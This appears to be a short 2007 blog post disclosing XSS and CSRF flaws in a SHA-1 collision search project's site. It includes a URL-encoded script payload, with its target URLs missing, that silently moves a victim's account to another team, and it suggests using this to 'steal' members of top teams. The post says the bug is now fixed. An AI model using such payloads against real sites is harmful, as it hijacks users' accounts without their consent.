Thursday, August 23, 2007

SHA-1 Collision Search Graz XSS and CSRF

A couple of days ago, at, they showed a project, for finding SHA-1 collisions.
After I registered, I found out that there was a "competition" of teams, for winning credits.

So, after checking out how it worked, I found a CSRF, and XSS at the team search engine.

So, I made a simple exploit, that will change your team to.. BOINC Confederation.

The XSS vuln, is here:

The CSRF vuln is in all forms..

The exploit (for firefox) is:{open(%22GET%22,%22,false);send(null);x=responseText.match(/id%20value=([0-9]*)/)[1];open(%22POST%22,%22,false);setRequestHeader(%22Content-Type%22,%22application/x-www-form-urlencoded%22);send(%22id=%22%2Bx);open(%22POST%22,%22,false);setRequestHeader(%22Content-Type%22,%22application/x-www-form-urlencoded%22);send(%22teamid=1%22);}%3C/script%3E&search=Search

Pretty simple :P

So, by "stealing" a user of an important team.. you can make your team win, the list of the top users is here:


The bug has been fixed :) is good to see that someone actually reads my blog xD